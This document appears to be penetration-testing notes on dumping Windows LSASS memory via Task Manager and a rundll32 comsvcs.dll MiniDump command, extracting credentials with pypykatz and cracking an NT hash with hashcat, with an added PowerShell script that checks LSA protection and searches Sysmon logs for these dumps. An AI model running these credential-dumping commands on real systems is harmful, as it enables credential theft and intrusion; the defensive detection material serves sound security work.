LSASS
Dumping LSASS
1. Task Manager Method
Open Task Manager
> Select the Processes tab
> Find & right click the Local Security Authority Process
> Select Create dump file
The dump file is written to the logged-on user's Temp directory:
C:\Users\loggedonusersdirectory\AppData\Local\Temp\lsass.DMP
2. Rundll32.exe and Comsvcs.dll Method
Finding LSASS PID
C:\Windows\system32> tasklist /svc
Image Name                     PID Services
========================= ======== ============================================
lsass.exe                      672 KeyIso, SamSs, VaultSvc
PS C:\Windows\system32> Get-Process lsass
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass
Creating lsass.dmp (the PID found above is passed as the second argument to MiniDump)
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
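Both methods above (Task Manager and rundll32 with comsvcs.dll) have to open a handle to lsass.exe with read access, and the second one also leaves its full command line in process-creation logs. The following PowerShell script is an added example, not part of the original notes, that shows the defender's side of this: it reports whether LSA Protection (RunAsPPL) and Credential Guard are active on the host, and it searches the Sysmon operational log for processes that opened lsass.exe with PROCESS_VM_READ and for rundll32 command lines that reference comsvcs.dll and MiniDump. It assumes Sysmon is installed with ProcessAccess (Event ID 10) and ProcessCreate (Event ID 1) logging enabled; the allowlist of source images is an assumption and must be tuned per environment.

```powershell
# Added example (not from the original notes): defender-side checks for the
# LSASS dumping techniques described above. Run in an elevated PowerShell
# session on the host being checked.

function Get-LsaProtectionStatus {
    # RunAsPPL under HKLM\SYSTEM\CurrentControlSet\Control\Lsa: a non-zero value
    # means LSASS runs as a Protected Process Light, so ordinary administrative
    # processes (Task Manager, rundll32) cannot obtain a dumpable handle to it.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $runAsPpl = if ($null -ne $lsa -and $null -ne $lsa.RunAsPPL) { [int]$lsa.RunAsPPL } else { 0 }

    # Credential Guard: SecurityServicesRunning contains 1 when it is active.
    # With it running, a dump of lsass.exe no longer contains the NT hashes.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)

    [pscustomobject]@{
        RunAsPPL               = $runAsPpl
        LsaProtectionEnabled   = ($runAsPpl -ne 0)
        CredentialGuardRunning = $credGuard
    }
}

# Helper: turn the EventData of a Sysmon event into a name -> value hashtable.
function ConvertFrom-SysmonEvent {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $data = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

function Find-LsassAccess {
    param(
        [int]$Hours = 24,
        # Assumed allowlist: processes that legitimately open lsass.exe on a
        # typical host. Tune this for your environment.
        [string[]]$AllowedSourceImages = @(
            'C:\Windows\System32\svchost.exe',
            'C:\Windows\System32\wininit.exe',
            'C:\Windows\System32\csrss.exe',
            'C:\Windows\System32\lsass.exe'
        )
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 10                      # Sysmon ProcessAccess
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $data = ConvertFrom-SysmonEvent -Event $e
        if ($data['TargetImage'] -notlike '*\lsass.exe') { continue }
        if ($AllowedSourceImages -contains $data['SourceImage']) { continue }
        # GrantedAccess is logged as a hex string such as 0x1FFFFF. Reading
        # process memory requires PROCESS_VM_READ (0x0010); anything without it
        # cannot produce a usable dump, so it is skipped to cut noise.
        $granted = [Convert]::ToInt32($data['GrantedAccess'], 16)
        if (($granted -band 0x10) -eq 0) { continue }
        [pscustomobject]@{
            Time          = $e.TimeCreated
            SourceImage   = $data['SourceImage']
            GrantedAccess = $data['GrantedAccess']
            CallTrace     = $data['CallTrace']
        }
    }
}

function Find-ComsvcsMiniDump {
    param([int]$Hours = 24)
    # Sysmon ProcessCreate (Event ID 1): the rundll32 + comsvcs.dll method
    # shown in the notes puts "comsvcs.dll" and "MiniDump" on the command line.
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $data = ConvertFrom-SysmonEvent -Event $e
        $cmd = $data['CommandLine']
        if ($cmd -match 'comsvcs' -and $cmd -match 'MiniDump') {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                User        = $data['User']
                ParentImage = $data['ParentImage']
                CommandLine = $cmd
            }
        }
    }
}

# Usage: print the hardening state, then any suspicious LSASS access in the last 48 hours.
Get-LsaProtectionStatus
Find-LsassAccess -Hours 48 | Format-Table -AutoSize
Find-ComsvcsMiniDump -Hours 48 | Format-Table -AutoSize
```

The Task Manager method does not produce a tell-tale command line, so the ProcessAccess check in Find-LsassAccess is the one that covers both techniques; the hardening check matters more than either detection, because with RunAsPPL enabled the handle is refused and with Credential Guard running the dump contains no NT hash to hand to hashcat.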
Using pypykatz to extract credentials from the dump
Running pypykatz
$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
Cracking the NT hash with hashcat (mode 1000 = NTLM)
$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt